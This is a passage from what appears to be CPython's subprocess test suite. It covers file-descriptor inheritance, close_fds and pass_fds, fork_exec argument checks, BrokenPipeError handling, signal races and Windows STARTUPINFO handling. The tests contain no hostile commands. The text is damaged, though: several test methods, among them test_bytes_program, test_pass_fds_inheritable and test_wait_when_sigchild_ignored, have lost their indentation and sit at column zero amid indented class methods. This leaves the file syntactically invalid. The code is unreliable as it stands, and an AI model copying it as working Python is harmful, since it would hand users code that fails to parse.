self.check_swap_fds(2, 1, 0)
    def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
        """Redirect two std fds while the remaining one is closed.

        `from_fds` are the parent descriptors backed by temp files;
        `to_fds` are the child std fds they are mapped to. The child writes
        each fd's own number to it, and we verify each parent descriptor
        received exactly the expected digit.
        """
        saved_fds = self._save_fds(range(3))
        try:
            for from_fd in from_fds:
                with tempfile.TemporaryFile() as f:
                    os.dup2(f.fileno(), from_fd)
            # Close the one std fd that is not being redirected (#32844).
            fd_to_close = (set(range(3)) - set(from_fds)).pop()
            os.close(fd_to_close)
            arg_names = ['stdin', 'stdout', 'stderr']
            kwargs = {}
            for from_fd, to_fd in zip(from_fds, to_fds):
                kwargs[arg_names[to_fd]] = from_fd
            code = textwrap.dedent(r'''
                import os, sys
                skipped_fd = int(sys.argv[1])
                for fd in range(3):
                    if fd != skipped_fd:
                        os.write(fd, str(fd).encode('ascii'))
            ''')
            skipped_fd = (set(range(3)) - set(to_fds)).pop()
            rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
                                 **kwargs)
            self.assertEqual(rc, 0)
            for from_fd, to_fd in zip(from_fds, to_fds):
                os.lseek(from_fd, 0, os.SEEK_SET)
                read_bytes = os.read(from_fd, 1024)
                read_fds = list(map(int, read_bytes.decode('ascii')))
                msg = textwrap.dedent(f"""
                    When testing {from_fds} to {to_fds} redirection,
                    parent descriptor {from_fd} got redirected
                    to descriptor(s) {read_fds} instead of descriptor {to_fd}.
                """)
                self.assertEqual([to_fd], read_fds, msg)
        finally:
            self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
    def test_surrogates_error_message(self):
        """A preexec_fn exception message containing surrogates must not crash."""
        def prepare():
            raise ValueError("surrogate:\uDCff")
        try:
            subprocess.call(
                ZERO_RETURN_CMD,
                preexec_fn=prepare)
        except ValueError as err:
            # Pure Python implementations keeps the message
            self.assertIsNone(subprocess._posixsubprocess)
            self.assertEqual(str(err), "surrogate:\uDCff")
        except subprocess.SubprocessError as err:
            # _posixsubprocess uses a default message
            self.assertIsNotNone(subprocess._posixsubprocess)
            self.assertEqual(str(err), "Exception occurred in preexec_fn.")
        else:
            self.fail("Expected ValueError or subprocess.SubprocessError")
    def test_undecodable_env(self):
        """Env vars with surrogate-escaped bytes must round-trip to the child."""
        for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
            encoded_value = value.encode("ascii", "surrogateescape")
            # test str with surrogates
            script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
            env = os.environ.copy()
            env[key] = value
            # Use C locale to get ASCII for the locale encoding to force
            # surrogate-escaping of \xFF in the child process
            env['LC_ALL'] = 'C'
            decoded_value = value
            stdout = subprocess.check_output(
                [sys.executable, "-c", script],
                env=env)
            stdout = stdout.rstrip(b'\n\r')
            self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
            # test bytes
            key = key.encode("ascii", "surrogateescape")
            script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
            env = os.environ.copy()
            env[key] = encoded_value
            stdout = subprocess.check_output(
                [sys.executable, "-c", script],
                env=env)
            stdout = stdout.rstrip(b'\n\r')
            self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
    def test_pipe_cloexec(self):
        """Pipes created for one Popen must not leak into a later child."""
        sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        # p1 holds its pipe fds open; p2 reports which fds it can see.
        p1 = subprocess.Popen([sys.executable, sleeper],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, close_fds=False)
        self.addCleanup(p1.communicate, b'')
        p2 = subprocess.Popen([sys.executable, fd_status],
                              stdout=subprocess.PIPE, close_fds=False)
        output, error = p2.communicate()
        result_fds = set(map(int, output.split(b',')))
        unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
                            p1.stderr.fileno()])
        self.assertFalse(result_fds & unwanted_fds,
                         "Expected no fds from %r to be open in child, "
                         "found %r" %
                              (unwanted_fds, result_fds & unwanted_fds))
    def test_pipe_cloexec_real_tools(self):
        """A qcat | qgrep pipeline must not hang due to leaked pipe fds."""
        qcat = support.findfile("qcat.py", subdir="subprocessdata")
        qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
        subdata = b'zxcvbn'
        data = subdata * 4 + b'\n'
        p1 = subprocess.Popen([sys.executable, qcat],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              close_fds=False)
        p2 = subprocess.Popen([sys.executable, qgrep, subdata],
                              stdin=p1.stdout, stdout=subprocess.PIPE,
                              close_fds=False)
        self.addCleanup(p1.wait)
        self.addCleanup(p2.wait)
        # Best-effort termination: the children may already have exited.
        def kill_p1():
            try:
                p1.terminate()
            except ProcessLookupError:
                pass
        def kill_p2():
            try:
                p2.terminate()
            except ProcessLookupError:
                pass
        self.addCleanup(kill_p1)
        self.addCleanup(kill_p2)
        p1.stdin.write(data)
        p1.stdin.close()
        # If the write end of p1's stdout pipe leaked into p2, p2 would
        # never see EOF and the select() below would time out.
        readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
        self.assertTrue(readfiles, "The child hung")
        self.assertEqual(p2.stdout.read(), data)
        p1.stdout.close()
        p2.stdout.close()
    def test_close_fds(self):
        """close_fds=True must close inherited fds; pass_fds must keep them."""
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])
        open_fds = set(fds)
        # add a bunch more fds
        for _ in range(9):
            fd = os.open(os.devnull, os.O_RDONLY)
            self.addCleanup(os.close, fd)
            open_fds.add(fd)
        # Make every fd inheritable so only close_fds controls leakage.
        for fd in open_fds:
            os.set_inheritable(fd, True)
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=False)
        output, ignored = p.communicate()
        remaining_fds = set(map(int, output.split(b',')))
        self.assertEqual(remaining_fds & open_fds, open_fds,
                         "Some fds were closed")
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True)
        output, ignored = p.communicate()
        remaining_fds = set(map(int, output.split(b',')))
        self.assertFalse(remaining_fds & open_fds,
                         "Some fds were left open")
        self.assertIn(1, remaining_fds, "Subprocess failed")
        # Keep some of the fd's we opened open in the subprocess.
        # This tests _posixsubprocess.c's proper handling of fds_to_keep.
        fds_to_keep = set(open_fds.pop() for _ in range(8))
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True,
                             pass_fds=fds_to_keep)
        output, ignored = p.communicate()
        remaining_fds = set(map(int, output.split(b',')))
        self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
                         "Some fds not in pass_fds were left open")
        self.assertIn(1, remaining_fds, "Subprocess failed")
    @unittest.skipIf(sys.platform.startswith("freebsd") and
                     os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
                     "Requires fdescfs mounted on /dev/fd on FreeBSD.")
    def test_close_fds_when_max_fd_is_lowered(self):
        """Confirm that issue21618 is fixed (may fail under valgrind)."""
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        # This launches the meat of the test in a child process to
        # avoid messing with the larger unittest processes maximum
        # number of file descriptors.
        #  This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE aftr setting up
        #   a bunch of high open fds above the new lower rlimit.
        #   Those are reported via stdout before launching a new
        #   process with close_fds=False to run the actual test:
        #   +--> The TEST: This one launches a fd_status.py
        #     subprocess with close_fds=True so we can find out if
        #     any of the fds above the lowered rlimit are still open.
        p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
        '''
        import os, resource, subprocess, sys, textwrap
        open_fds = set()
        # Add a bunch more fds to pass down.
        for _ in range(40):
            fd = os.open(os.devnull, os.O_RDONLY)
            open_fds.add(fd)

        # Leave a two pairs of low ones available for use by the
        # internal child error pipe and the stdout pipe.
        # We also leave 10 more open as some Python buildbots run into
        # "too many open files" errors during the test if we do not.
        for fd in sorted(open_fds)[:14]:
            os.close(fd)
            open_fds.remove(fd)

        for fd in open_fds:
            #self.addCleanup(os.close, fd)
            os.set_inheritable(fd, True)

        max_fd_open = max(open_fds)

        # Communicate the open_fds to the parent unittest.TestCase process.
        print(','.join(map(str, sorted(open_fds))))
        sys.stdout.flush()

        rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
        try:
            # 29 is lower than the highest fds we are leaving open.
            resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
            # Launch a new Python interpreter with our low fd rlim_cur that
            # inherits open fds above that limit.  It then uses subprocess
            # with close_fds=True to get a report of open fds in the child.
            # An explicit list of fds to check is passed to fd_status.py as
            # letting fd_status rely on its default logic would miss the
            # fds above rlim_cur as it normally only checks up to that limit.
            subprocess.Popen(
                [sys.executable, '-c',
                 textwrap.dedent("""
                     import subprocess, sys
                     subprocess.Popen([sys.executable, %r] +
                                      [str(x) for x in range({max_fd})],
                                      close_fds=True).wait()
                     """.format(max_fd=max_fd_open+1))],
                close_fds=False).wait()
        finally:
            resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
        ''' % fd_status)], stdout=subprocess.PIPE)

        output, unused_stderr = p.communicate()
        output_lines = output.splitlines()
        # Line 1: fds opened by the intermediate child.
        # Line 2: fds that fd_status.py still saw open under close_fds=True.
        self.assertEqual(len(output_lines), 2,
                         msg="expected exactly two lines of output:\n%r" % output)
        opened_fds = set(map(int, output_lines[0].strip().split(b',')))
        remaining_fds = set(map(int, output_lines[1].strip().split(b',')))

        self.assertFalse(remaining_fds & opened_fds,
                         msg="Some fds were left open.")
    # Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
    # descriptor of a pipe closed in the parent process is valid in the
    # child process according to fstat(), but the mode of the file
    # descriptor is invalid, and read or write raise an error.
    @support.requires_mac_ver(10, 5)
    def test_pass_fds(self):
        """pass_fds keeps exactly the listed fds open in the child."""
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        open_fds = set()
        # Create five inheritable pipe pairs to pass down selectively.
        for x in range(5):
            fds = os.pipe()
            self.addCleanup(os.close, fds[0])
            self.addCleanup(os.close, fds[1])
            os.set_inheritable(fds[0], True)
            os.set_inheritable(fds[1], True)
            open_fds.update(fds)
        for fd in open_fds:
            p = subprocess.Popen([sys.executable, fd_status],
                                 stdout=subprocess.PIPE, close_fds=True,
                                 pass_fds=(fd, ))
            output, ignored = p.communicate()
            remaining_fds = set(map(int, output.split(b',')))
            to_be_closed = open_fds - {fd}
            self.assertIn(fd, remaining_fds, "fd to be passed not passed")
            self.assertFalse(remaining_fds & to_be_closed,
                             "fd to be closed passed")
            # pass_fds overrides close_fds with a warning.
            with self.assertWarns(RuntimeWarning) as context:
                self.assertFalse(subprocess.call(
                        ZERO_RETURN_CMD,
                        close_fds=False, pass_fds=(fd, )))
                self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
    # bpo-32270: Ensure that descriptors specified in pass_fds
    # are inherited even if they are used in redirections.
    # Contributed by @izbyshev.
    def test_pass_fds_redirected(self):
        """Regression test for https://bugs.python.org/issue32270."""
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        pass_fds = []
        for _ in range(2):
            fd = os.open(os.devnull, os.O_RDWR)
            self.addCleanup(os.close, fd)
            pass_fds.append(fd)
        stdout_r, stdout_w = os.pipe()
        self.addCleanup(os.close, stdout_r)
        self.addCleanup(os.close, stdout_w)
        # The pipe's write end doubles as the child's stdout AND a pass_fd.
        pass_fds.insert(1, stdout_w)
        with subprocess.Popen([sys.executable, fd_status],
                              stdin=pass_fds[0],
                              stdout=pass_fds[1],
                              stderr=pass_fds[2],
                              close_fds=True,
                              pass_fds=pass_fds):
            output = os.read(stdout_r, 1024)
        fds = {int(num) for num in output.split(b',')}
        # The child must see the three std fds plus every passed fd.
        self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
    def test_select_unbuffered(self):
        """bufsize=0 must give truly unbuffered pipes that work with select().

        Issue #11459: bufsize=0 should really set the pipes as
        unbuffered (and therefore let select() work properly).
        """
        # Skip the test when the select module is unavailable; the local
        # name intentionally shadows any module-level import here.
        select = support.import_module("select")
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdout.write("apple")'],
                             stdout=subprocess.PIPE,
                             bufsize=0)
        f = p.stdout
        self.addCleanup(f.close)
        try:
            # A partial read followed by select() shows the remaining byte
            # is immediately available (no stdio buffering in the way).
            self.assertEqual(f.read(4), b"appl")
            self.assertIn(f, select.select([f], [], [], 0.0)[0])
        finally:
            p.wait()
    def test_zombie_fast_process_del(self):
        """A Popen deleted before exit must land in subprocess._active.

        Issue #12650: on Unix, if Popen.__del__() was called before the
        process exited, it wouldn't be added to subprocess._active, and would
        remain a zombie.
        """
        # spawn a Popen, and delete its reference before it exits
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys, time;'
                              'time.sleep(0.2)'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        ident = id(p)
        pid = p.pid
        # Dropping the only reference triggers __del__ and a ResourceWarning.
        with support.check_warnings(('', ResourceWarning)):
            p = None
        if mswindows:
            # subprocess._active is not used on Windows and is set to None.
            self.assertIsNone(subprocess._active)
        else:
            # check that p is in the active processes list
            self.assertIn(ident, [id(o) for o in subprocess._active])
    def test_leak_fast_process_del_killed(self):
        """A deleted-then-killed Popen must eventually leave _active.

        Issue #12650: on Unix, if Popen.__del__() was called before the
        process exited, and the process got killed by a signal, it would never
        be removed from subprocess._active, which triggered a FD and memory
        leak.
        """
        # spawn a Popen, delete its reference and kill it
        p = subprocess.Popen([sys.executable, "-c",
                              'import time;'
                              'time.sleep(3)'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        ident = id(p)
        pid = p.pid
        with support.check_warnings(('', ResourceWarning)):
            p = None
        os.kill(pid, signal.SIGKILL)
        if mswindows:
            # subprocess._active is not used on Windows and is set to None.
            self.assertIsNone(subprocess._active)
        else:
            # check that p is in the active processes list
            self.assertIn(ident, [id(o) for o in subprocess._active])
        # let some time for the process to exit, and create a new Popen: this
        # should trigger the wait() of p
        time.sleep(0.2)
        with self.assertRaises(OSError):
            with subprocess.Popen(NONEXISTING_CMD,
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE) as proc:
                pass
        # p should have been wait()ed on, and removed from the _active list
        self.assertRaises(OSError, os.waitpid, pid, 0)
        if mswindows:
            # subprocess._active is not used on Windows and is set to None.
            self.assertIsNone(subprocess._active)
        else:
            self.assertNotIn(ident, [id(o) for o in subprocess._active])
    def test_close_fds_after_preexec(self):
        """close_fds must also close fds that preexec_fn dup2()ed in the child."""
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        # this FD is used as dup2() target by preexec_fn, and should be closed
        # in the child process
        fd = os.dup(1)
        self.addCleanup(os.close, fd)
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True,
                             preexec_fn=lambda: os.dup2(1, fd))
        output, ignored = p.communicate()
        remaining_fds = set(map(int, output.split(b',')))
        self.assertNotIn(fd, remaining_fds)
    @support.cpython_only
    def test_fork_exec(self):
        """fork_exec() must raise TypeError cleanly on bad argument types.

        Issue #22290: fork_exec() must not crash on memory allocation failure
        or other errors.
        """
        import _posixsubprocess
        gc_enabled = gc.isenabled()
        try:
            # Use a preexec function and enable the garbage collector
            # to force fork_exec() to re-enable the garbage collector
            # on error.
            func = lambda: None
            gc.enable()
            # Each tuple makes exactly one positional argument the wrong
            # type (123 instead of a list).
            for args, exe_list, cwd, env_list in (
                (123,      [b"exe"], None, [b"env"]),
                ([b"arg"], 123,      None, [b"env"]),
                ([b"arg"], [b"exe"], 123,  [b"env"]),
                ([b"arg"], [b"exe"], None, 123),
                ):
                with self.assertRaises(TypeError) as err:
                    _posixsubprocess.fork_exec(
                        args, exe_list,
                        True, (), cwd, env_list,
                        -1, -1, -1, -1,
                        1, 2, 3, 4,
                        True, True,
                        False, [], 0, -1,
                        func)
                # Attempt to prevent
                # "TypeError: fork_exec() takes exactly N arguments (M given)"
                # from passing the test.  More refactoring to have us start
                # with a valid *args list, confirm a good call with that works
                # before mutating it in various ways to ensure that bad calls
                # with individual arg type errors raise a typeerror would be
                # ideal.  Saving that for a future PR...
                self.assertNotIn('takes exactly', str(err.exception))
        finally:
            if not gc_enabled:
                gc.disable()
    @support.cpython_only
    def test_fork_exec_sorted_fd_sanity_check(self):
        """Invalid fds_to_keep values must be rejected with ValueError.

        Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
        """
        import _posixsubprocess
        class BadInt:
            # Converts successfully once, then raises: exercises the C code
            # path where __int__() fails during the second conversion.
            first = True
            def __init__(self, value):
                self.value = value
            def __int__(self):
                if self.first:
                    self.first = False
                    return self.value
                raise ValueError

        gc_enabled = gc.isenabled()
        try:
            gc.enable()
            for fds_to_keep in (
                (-1, 2, 3, 4, 5),  # Negative number.
                ('str', 4),  # Not an int.
                (18, 23, 42, 2**63),  # Out of range.
                (5, 4),  # Not sorted.
                (6, 7, 7, 8),  # Duplicate.
                (BadInt(1), BadInt(2)),
            ):
                with self.assertRaises(
                        ValueError,
                        msg='fds_to_keep={}'.format(fds_to_keep)) as c:
                    _posixsubprocess.fork_exec(
                        [b"false"], [b"false"],
                        True, fds_to_keep, None, [b"env"],
                        -1, -1, -1, -1,
                        1, 2, 3, 4,
                        True, True,
                        None, None, None, -1,
                        None)
                self.assertIn('fds_to_keep', str(c.exception))
        finally:
            if not gc_enabled:
                gc.disable()
    def test_communicate_BrokenPipeError_stdin_close(self):
        """communicate() must swallow BrokenPipeError raised by stdin.close()."""
        # By not setting stdout or stderr or a timeout we force the fast path
        # that just calls _stdin_write() internally due to our mock.
        proc = subprocess.Popen(ZERO_RETURN_CMD)
        with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
            mock_proc_stdin.close.side_effect = BrokenPipeError
            proc.communicate()  # Should swallow BrokenPipeError from close.
            mock_proc_stdin.close.assert_called_with()
    def test_communicate_BrokenPipeError_stdin_write(self):
        """communicate() must swallow BrokenPipeError raised by stdin.write()."""
        # By not setting stdout or stderr or a timeout we force the fast path
        # that just calls _stdin_write() internally due to our mock.
        proc = subprocess.Popen(ZERO_RETURN_CMD)
        with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
            mock_proc_stdin.write.side_effect = BrokenPipeError
            proc.communicate(b'stuff')  # Should swallow the BrokenPipeError.
            mock_proc_stdin.write.assert_called_once_with(b'stuff')
            mock_proc_stdin.close.assert_called_once_with()
    def test_communicate_BrokenPipeError_stdin_flush(self):
        """communicate() must swallow BrokenPipeError raised by stdin.flush()."""
        # Setting stdin and stdout forces the ._communicate() code path.
        # python -h exits faster than python -c pass (but spams stdout).
        proc = subprocess.Popen([sys.executable, '-h'],
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE)
        with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
                open(os.devnull, 'wb') as dev_null:
            mock_proc_stdin.flush.side_effect = BrokenPipeError
            # because _communicate registers a selector using proc.stdin...
            mock_proc_stdin.fileno.return_value = dev_null.fileno()
            # _communicate() should swallow BrokenPipeError from flush.
            proc.communicate(b'stuff')
            mock_proc_stdin.flush.assert_called_once_with()
    def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
        """communicate(timeout=...) must swallow BrokenPipeError from close()."""
        # Setting stdin and stdout forces the ._communicate() code path.
        # python -h exits faster than python -c pass (but spams stdout).
        proc = subprocess.Popen([sys.executable, '-h'],
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE)
        with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
            mock_proc_stdin.close.side_effect = BrokenPipeError
            # _communicate() should swallow BrokenPipeError from close.
            proc.communicate(timeout=999)
            mock_proc_stdin.close.assert_called_once_with()
    @unittest.skipUnless(_testcapi is not None
                         and hasattr(_testcapi, 'W_STOPCODE'),
                         'need _testcapi.W_STOPCODE')
    def test_stopped(self):
        """Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
        args = ZERO_RETURN_CMD
        proc = subprocess.Popen(args)
        # Wait until the real process completes to avoid zombie process
        support.wait_process(proc.pid, exitcode=0)
        # Fake a waitpid() result claiming the process was stopped by signal 3.
        status = _testcapi.W_STOPCODE(3)
        with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
            returncode = proc.wait()
        self.assertEqual(returncode, -3)
    def test_send_signal_race(self):
        """send_signal() must not signal a process that already exited.

        bpo-38630: send_signal() must poll the process exit status to reduce
        the risk of sending the signal to the wrong process.
        """
        proc = subprocess.Popen(ZERO_RETURN_CMD)
        # wait until the process completes without using the Popen APIs.
        support.wait_process(proc.pid, exitcode=0)
        # returncode is still None but the process completed.
        self.assertIsNone(proc.returncode)
        with mock.patch("os.kill") as mock_kill:
            proc.send_signal(signal.SIGTERM)
        # send_signal() didn't call os.kill() since the process already
        # completed.
        mock_kill.assert_not_called()
        # Don't check the returncode value: the test reads the exit status,
        # so Popen failed to read it and uses a default returncode instead.
        self.assertIsNotNone(proc.returncode)
    def test_send_signal_race2(self):
        """send_signal() must not raise if the process exits mid-call.

        bpo-40550: the process might exit between the returncode check and
        the kill operation.
        """
        p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])
        # wait for process to exit
        while not p.returncode:
            p.poll()
        # Force the race: returncode looks unset while poll() reports nothing.
        with mock.patch.object(p, 'poll', new=lambda: None):
            p.returncode = None
            p.send_signal(signal.SIGTERM)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
    """Windows-specific subprocess behavior: STARTUPINFO handling,
    creationflags, handle inheritance (close_fds) and shell invocation."""

    def test_startupinfo(self):
        """A populated STARTUPINFO set via attributes is accepted."""
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        STARTF_USESHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = SW_MAXIMIZE
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_startupinfo_keywords(self):
        """Same as test_startupinfo, but passing the fields as STARTUPINFO
        constructor keyword arguments."""
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        # NOTE(review): local name has a typo (USERSHOWWINDOW); the value
        # still matches STARTF_USESHOWWINDOW == 1, so the test is valid.
        STARTF_USERSHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO(
            dwFlags=STARTF_USERSHOWWINDOW,
            wShowWindow=SW_MAXIMIZE
        )
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_startupinfo_copy(self):
        """bpo-34044: Popen must not modify the caller's STARTUPINFO."""
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = subprocess.SW_HIDE
        # Call Popen() twice with the same startupinfo object to make sure
        # that it's not modified
        for _ in range(2):
            cmd = ZERO_RETURN_CMD
            with open(os.devnull, 'w') as null:
                proc = subprocess.Popen(cmd,
                                        stdout=null,
                                        stderr=subprocess.STDOUT,
                                        startupinfo=startupinfo)
                with proc:
                    proc.communicate()
                self.assertEqual(proc.returncode, 0)
            # Every field the caller set must be intact after the spawn.
            self.assertEqual(startupinfo.dwFlags,
                             subprocess.STARTF_USESHOWWINDOW)
            self.assertIsNone(startupinfo.hStdInput)
            self.assertIsNone(startupinfo.hStdOutput)
            self.assertIsNone(startupinfo.hStdError)
            self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
            self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})

    def test_creationflags(self):
        """creationflags is forwarded to CreateProcess (CREATE_NEW_CONSOLE)."""
        CREATE_NEW_CONSOLE = 16
        sys.stderr.write(" a DOS box should flash briefly ...\n")
        subprocess.call(sys.executable +
                        ' -c "import time; time.sleep(0.25)"',
                        creationflags=CREATE_NEW_CONSOLE)

    def test_invalid_args(self):
        # preexec_fn is POSIX-only; on Windows it must raise ValueError.
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          preexec_fn=lambda: 1)

    @support.cpython_only
    def test_issue31471(self):
        # There shouldn't be an assertion failure in Popen() in case the env
        # argument has a bad keys() method.
        class BadEnv(dict):
            keys = None
        with self.assertRaises(TypeError):
            subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())

    def test_close_fds(self):
        # close_fds=True must still let the child run and report its exit code.
        rc = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"],
                             close_fds=True)
        self.assertEqual(rc, 47)

    def test_close_fds_with_stdio(self):
        """Interaction of close_fds with inherited OS handles and the
        STARTUPINFO lpAttributeList handle_list."""
        import msvcrt
        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])
        handles = []
        for fd in fds:
            os.set_inheritable(fd, True)
            handles.append(msvcrt.get_osfhandle(fd))
        # close_fds=False: the inherited handle is usable by the child.
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, close_fds=False)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 0)
        int(stdout.strip())  # Check that stdout is an integer
        # close_fds=True: the handle is not inherited, so the child fails.
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 1)
        self.assertIn(b"OSError", stderr)
        # The same as the previous call, but with an empty handle_list
        handle_list = []
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {"handle_list": handle_list}
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             startupinfo=startupinfo, close_fds=True)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 1)
